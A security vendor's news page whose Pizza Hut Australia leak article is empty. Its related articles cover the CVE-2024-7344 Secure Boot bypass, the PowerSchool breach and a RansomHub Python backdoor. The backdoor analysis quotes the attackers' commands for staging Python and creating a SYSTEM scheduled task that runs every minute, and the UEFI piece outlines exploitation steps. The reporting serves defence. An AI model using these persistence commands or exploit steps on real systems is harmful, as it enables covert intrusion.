company logo

Product

Our Product

We are Reshaping the way Developers find and fix vulnerabilities before they get exploited.

Bulk IP/Domain Lookup

Threatspy

Solutions

By Industry

BFSI

Healthcare

Education

IT & Telecom

Government

By Role

CISO/CTO

DevOps Engineer

Resources

Resource Library

Get actionable insight straight from our threat Intel lab to keep you informed about the ever-changing Threat landscape.

Subscribe to Our Weekly Threat Digest

Company

Contact Us

Have queries, feedback or prospects? Get in touch and we shall be with you shortly.

loading..
loading..
loading..
Loading...

Data Leak

Pizza Hut

loading..
loading..
loading..

ShinyHunters Exposed Over One Million Pizza Hut Australia Customers' Data!

Over One Million Customer of Pizza Hut Australia Details Compromised in a Massive Data Leak, But ShinyHunters Threat Group Claimed to be Behind it

20-Sep-2023
6 min read

No content available.

Related Articles

loading..

UEBI

A flaw exposing UEFI Secure Boot vulnerabilities. Learn how attackers exploit it...

Researchers have identified an exceptionally critical vulnerability, CVE-2024-7344, that undermines UEFI Secure Boot, a cornerstone security mechanism designed to ensure the integrity of the system boot process. This vulnerability enables malicious code execution during the boot sequence, even when Secure Boot is active, jeopardizing countless modern systems' security posture. The impacted systems span a broad spectrum of UEFI-based devices, significantly elevating the risks of deploying UEFI bootkits such as Bootkitty or BlackLotus. The ramifications of this discovery are profound. Secure Boot, integral to protecting the boot chain, becomes ineffective when exploited, leading to unauthorized code execution. This raises severe security concerns across industries relying on UEFI-based devices, as attackers can compromise systems without triggering conventional security mechanisms. ### In-Depth Analysis of CVE-2024-7344 #### Vulnerability Context The vulnerability emanates from a defective UEFI application, signed by Microsoft’s widely trusted Microsoft Corporation UEFI CA 2011 certificate. This enables attackers to circumvent Secure Boot by executing unsigned binaries during startup. The vulnerability affects multiple recovery software suites, including but not limited to: - **Howyar SysReturn** (versions prior to 10.2.023\_20240919) - **Greenware GreenGuard** (versions prior to 10.2.023-20240927) - **Radix SmartRecovery** (versions prior to 11.2.023-20240927) - **Sanfong EZ-back System** (versions prior to 10.3.024-20241127) - **WASAY eRecoveryRX** (versions prior to 8.4.022-20241127) - **CES NeoImpact** (versions prior to 10.1.024-20241127) - **SignalComputer HDD King** (versions prior to 10.3.021-20241127) #### Root Cause and Technical Insights The crux of the vulnerability lies in the usage of a custom PE loader, bypassing standard UEFI functions such as `LoadImage` and `StartImage`. This flawed implementation allows the execution of unsigned UEFI binaries from a specifically crafted file named `cloak.dat`, rendering Secure Boot policies ineffective. #### Exploitation Mechanism Meticulous investigation revealed that the `cloak.dat` file, part of the vulnerable recovery software, contains an encrypted UEFI binary. Instead of leveraging UEFI’s integrity checks, the custom loader decrypts and executes the binary directly. The steps to exploit this vulnerability include: 1. **Replacing the Bootloader**: Attackers substitute the system’s default bootloader with the compromised `reloader.efi` binary. 2. **Deploying Malicious Payloads**: A crafted `cloak.dat` file containing unsigned binaries is placed on the EFI System Partition (ESP). 3. **Executing the Payload**: Upon reboot, the malicious binary executes without adherence to Secure Boot policies. The attack requires elevated privileges (e.g., local administrator rights on Windows or root access on Linux) but is feasible across systems trusting Microsoft’s third-party UEFI certificate. ### UEFI Secure Boot: A Comprehensive Overview UEFI Secure Boot ensures the integrity of the boot process by validating binaries against two key databases: 1. **db**: Lists trusted certificates and hashes authorized for execution. 2. **dbx**: Enumerates revoked certificates and hashes, explicitly forbidding their execution. Most UEFI devices ship with Microsoft’s certificates preloaded to maintain compatibility with major operating systems. However, this reliance on Microsoft centralizes control over boot security, exposing potential systemic vulnerabilities when these certificates are compromised. ### Coordinated Disclosure and Remediation Timeline The responsible disclosure process ensured swift vendor responses and mitigation measures. Key milestones include: - **2024-07-08**: Discovery of the vulnerability by researchers. - **2024-07-09**: Reporting to CERT Coordination Center (CERT/CC). - **2024-08-05**: CERT/CC engages affected vendors. - **2024-08-20**: Initial patches reviewed; additional flaws identified. - **2024-09-23**: Disclosure rescheduled to align with remediation timelines. - **2025-01-14**: Vulnerable binaries revoked in Microsoft’s Patch Tuesday update. This coordinated effort underscores the importance of collaboration between researchers, CERTs, and vendors in addressing security threats efficiently. ### Mitigation Strategies and Detection Mechanisms #### Applying UEFI Revocations Users are strongly advised to update their systems with the latest UEFI revocations from Microsoft. Verification steps include: **Windows Systems**: ```powershell [System.Text.Encoding]::ASCII.GetString((Get-SecureBootUEFI db).bytes) -match 'Microsoft Corporation UEFI CA 2011' [BitConverter]::ToString((Get-SecureBootUEFI dbx).bytes) -replace '-' -match 'cdb7c90d3ab8833d5324f5d8516d41fa990b9ca721fe643fffaef9057d9f9e48' ``` **Linux Systems**: ```bash dbxtool --list | grep 'cdb7c90d3ab8833d5324f5d8516d41fa990b9ca721fe643fffaef9057d9f9e48' ``` #### Strengthening UEFI Configurations 1. **Customized Secure Boot Policies**: Tailor Secure Boot settings to restrict unauthorized access. 2. **EFI Partition Protections**: Limit access to the EFI System Partition through managed permissions. 3. **Remote Attestation**: Leverage TPM for remote validation of boot configurations. ### Implications and Recommendations CVE-2024-7344 exemplifies systemic vulnerabilities in the UEFI ecosystem, driven by opaque third-party signing processes. To enhance security, stakeholders must advocate for greater transparency and stringent review protocols in UEFI application signing. Microsoft’s upcoming UEFI certificate updates provide a pivotal opportunity to address these challenges. For detailed inquiries, contact [threatintel@researchteam.com](mailto\:threatintel@researchteam.com) or visit [Threat Intelligence page](https://www.researchteam.com).

loading..   18-Jan-2025
loading..   4 min read
loading..

Extortion

Explore the PowerSchool data breach affecting millions of students and teachers....

The education technology sector experienced a major setback as PowerSchool, a leading provider of school records software, suffered a cyberattack compromising the personal data of millions of students and teachers. The breach, occurring in December, has raised concerns about data security and privacy within K-12 school systems across the United States, particularly due to its vast scale and the historical depth of the compromised data. Unlike many cyberattacks, this incident affected records spanning over a decade, exposing systemic vulnerabilities in how educational data is stored and protected. With PowerSchool’s software supporting over 60 million students, the incident has left educational institutions grappling with the fallout. ### Scale of the Breach Sources within affected school districts confirmed that hackers accessed vast troves of sensitive information, including historical data on students and teachers. This information reportedly dates back as far as the 2009-2010 school year for some districts. Compromised data includes names, addresses, Social Security numbers, some medical information, grade data, and other personally identifiable information (PII). A school district representative disclosed, “In our case, the attackers gained access to all historical student and teacher data. This breach extends far beyond current records, affecting anyone whose information has ever been stored in the PowerSchool system.” Logs from some districts revealed that unauthorized access began even earlier than PowerSchool’s official timeline of late December. ### Insufficient Security Measures One major concern highlighted by this incident is the lack of basic cybersecurity measures. According to affected districts, PowerSchool’s compromised system lacked multi-factor authentication (MFA), a critical layer of defense against cyberattacks. Without MFA, attackers could easily use stolen credentials to access sensitive systems, as there were no additional barriers like verification codes or biometric checks to prevent unauthorized logins. This glaring security lapse likely facilitated the breach, allowing hackers to infiltrate and extract data with minimal resistance. While PowerSchool spokesperson Beth Keebler confirmed that the company employs MFA in its operations, she declined to elaborate on its implementation or the specific systems protected. Experts argue that the absence of robust security measures, particularly in systems handling such sensitive information, underscores a systemic vulnerability in the education technology sector. Mark Racine, CEO of RootED Solutions, emphasized in a blog post that this breach affects not only current PowerSchool customers but also former customers, significantly expanding the scale of impacted individuals. ### Affected Districts and Data Exposure Several districts have publicly confirmed the breach’s impact on their data. For instance, the Menlo Park City School District reported unauthorized access to personal details of all current students and staff as well as historical records dating back over a decade. Similarly, the Rancho Santa Fe School District revealed that teachers' login credentials were also compromised, potentially endangering ongoing educational processes. These examples underscore the tangible effects of the breach on both operational and personal levels within the affected communities. The Menlo Park City School District in California revealed that all current and historical data on students and staff had been accessed. Similarly, the Rancho Santa Fe School District reported that the attackers gained access to teachers’ credentials for the PowerSchool system. Other districts are reporting affected student numbers that are four to ten times higher than current enrollment, further highlighting the magnitude of the breach. PowerSchool’s FAQ for customers indicated that while the type of stored data varies by district and state requirements, the breach included significant PII. Despite this, Keebler stated that the company’s ongoing review suggests most affected customers did not have Social Security numbers or medical information exfiltrated. ### PowerSchool’s Response PowerSchool claims to have taken “appropriate steps” to prevent the dissemination of stolen data, asserting that the compromised information has been deleted without further replication. Experts suggest that implementing robust encryption, regular security audits, and advanced access controls like multi-factor authentication could have minimized the risk of such breaches. Furthermore, clear communication about the specific measures taken and evidence supporting the deletion claims would bolster trust among stakeholders. Without such transparency, questions about the effectiveness of PowerSchool’s response are likely to persist. However, the company has not disclosed specific measures taken or provided evidence to support its claim. “While our data review remains ongoing, we have identified the schools and districts whose data was involved and are working to notify impacted individuals,” said Keebler in a statement. PowerSchool declined to publicly share the names of affected districts, adding to frustrations over transparency. ### Larger Implications The breach raises critical questions about the security of sensitive data in educational systems. Legislative changes, such as mandating comprehensive data encryption standards and requiring multi-factor authentication across all edtech platforms, could significantly reduce vulnerabilities. Additionally, implementing stricter data retention policies and ensuring regular compliance audits for educational institutions could help address these security concerns effectively. With more districts relying on technology to manage records, the need for stringent cybersecurity measures has never been greater. Experts advocate for mandatory adoption of practices like MFA, encryption, and regular security audits to protect data. Moreover, this incident highlights the risks of retaining extensive historical data without robust safeguards. School districts must reassess their data retention policies and invest in secure infrastructure to prevent similar breaches in the future.

loading..   17-Jan-2025
loading..   5 min read
loading..

Ransomhub

Backdoor

Python-based backdoor used by RansomHub ransomware, exploiting network flaws wit...

In an alarming incident reported in Q4 2024, reveals evidence of a sophisticated threat actor utilizing a Python-based backdoor to maintain persistent access to compromised endpoints. This breach was exploited to deploy RansomHub encryptors across the impacted network. Earlier, in February 2024, [ReliaQuest documented a prior version of this malware](https://www.reliaquest.com/blog/new-python-socgholish-infection-chain/), highlighting the continuous evolution of this malicious tool. ### Key Features of the Latest Python Backdoor GuidePoint’s investigation revealed critical updates in the latest variant of the Python-based backdoor, setting it apart from its predecessors. Key distinctions include: - **Obfuscation Techniques**: Utilized [PyObfuscate[.]com](https://blog.sucuri.net/2024/06/socgholish-malware.html) for code obfuscation to evade detection. - **Deployment Method**: Exploited Remote Desktop Protocol (RDP) for lateral movement. - **Unique Indicators of Compromise (IoC)**: Introduced distinct filenames, scheduled task names, and command-and-control (C2) addresses. Collaboration with cybersecurity experts, including @drb_ra, resulted in the publication of 18 C2 IP addresses on GitHub under the repository “[drb-ra/C2IntelFeeds](https://github.com/drb-ra/C2IntelFeeds).” ### The Deployment Process The malware deployment followed a systematic and precise methodology: 1. **Initial Access**: [SocGholish (FakeUpdate)](https://mediatrust.com/blog/socgholish-driveby-download-compromised-landing-page/) was identified as the initial access vector. 2. **Python Backdoor Deployment**: Dropped on the initial compromised system 20 minutes post-infection. 3. **Lateral Movement**: Additional systems were infected via RDP. The five-step process for installing Python and deploying the backdoor included: 1. Navigating to the target directory: `C:\users\<redacted>\appdata\local\connecteddevicesplatform` 2. Installing Python: ``` wget https://www.python.org/ftp/python/3.12.0/python-3.12.0-embed-amd64.zip -OutFile .\python3.12.zip ``` 3. Setting up PIP and required libraries: ``` wget https://bootstrap.pypa.io/pip/pip.pyz -OutFile .\pip.pyz; .\pythonw.exe pip.pyz --trusted-host files.pythonhosted.org --trusted-host pypi.org install pycryptodome virtualenv requests pipx --upgrade pip --no-warn-script-location; ``` 4. Creating a Python proxy script: `get-pip2.pyd` 5. Establishing persistence with scheduled tasks: ``` powershell $a = New-ScheduledTaskAction -WorkingDirectory 'C:\Users\<redacted>\AppData\Local\ConnectedDevicesPlatform\get-pip' -Execute 'pythonw.exe' -Argument 'get-pip2.pyd'; $t = New-ScheduledTaskTrigger -Once -At (Get-Date) -RepetitionInterval (New-TimeSpan -Minutes 1); $s = New-ScheduledTaskSettingsSet -ExecutionTimeLimit '00:00:00' -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries; Register-ScheduledTask -TaskName 'get-pip2' -Action $a -Trigger $t -Settings $s -User 'system' ``` ### Technical Analysis of the Python Script #### Functionality The backdoor functions as a reverse proxy, creating a SOCKS5-like tunnel to enable lateral movement. Key operations include: 1. Establishing an initial TCP connection to a hardcoded IP address. 2. Utilizing the received data to create a secondary connection. 3. Acting as a proxy for threat actor communication. #### Obfuscation and AI-Generated Code The script employs advanced obfuscation techniques and demonstrates exceptional coding standards. Observations include: - **Polished Code**: Suggestive of meticulous programming or AI-assisted code generation. - **Structured Design**: Utilized classes, descriptive method names, and robust error handling. - **Dynamic Variables**: Hardcoded IPs and ports ensure seamless operation. #### C2 Behavior The backdoor’s C2 communications involve: 1. TCP socket creation and idle state awaiting specific bytes. 2. Secondary TCP connection based on received data. 3. SOCKS5-like tunnel establishment for proxied traffic. ### Evidence of Advanced Persistence The malware’s persistence strategy involves: - Regular execution via scheduled tasks. - Frequent updates to evade detection. - Leveraging obfuscated versions for minimal VirusTotal detection. Notably, [VirusTotal’s report on the malware](https://www.virustotal.com/gui/file/64d8f12cdcd1dfa7a3c012a36c011a43303dc8357b7899db254a022b187cba03) highlighted zero detections at the time of upload. ### Indicators of Compromise (IoC) Key IoCs include: - **Filename**: `get-pip2.pyd` - **Task Name**: `get-pip2` - **SHA256 Hash**: `5089fd6ce6d8c0fca8d9c4af7441ee9198088bfba6e200e27fe30d3bc0c6401c` - **C2 IPs**: Examples include `185.174.101.240`, `38.180.81.153`, and `104.238.61.144` (full list available on GitHub). ### Key Takeaways - RansomHub affiliates are leveraging Python-based backdoors for persistence and evasion. - The adoption of AI in malware development is an emerging trend. - Continuous monitoring and collaboration are essential to counter these threats. [Halcyon’s detailed threat insights](https://www.halcyon.ai/blog/halcyon-threat-insights-012-january-2025-ransomware-report) provide further context on this evolution.

loading..   16-Jan-2025
loading..   4 min read
Company Logo
logo

Secure Blink automates the web application and API security for developers and security teams, helping them to rapidly identify and mitigate vulnerabilities more effectively than they can today.

Find Us Online

LinkedIn Logo
Twitter Logo
Discord Logo
Telegram Logo
YouTube Logo
contact@secureblink.com

This website uses cookies to ensure you get the best experience on our website. By continuing on our website, you consent to our use of cookies. To find out more about how we use cookies, please see our Cookies Policy.

contact@secureblink.com

@ Copyright 2025 Secure Blink. All rights reserved.

16192, Coastal Highway, Lewes, Delaware, US-19958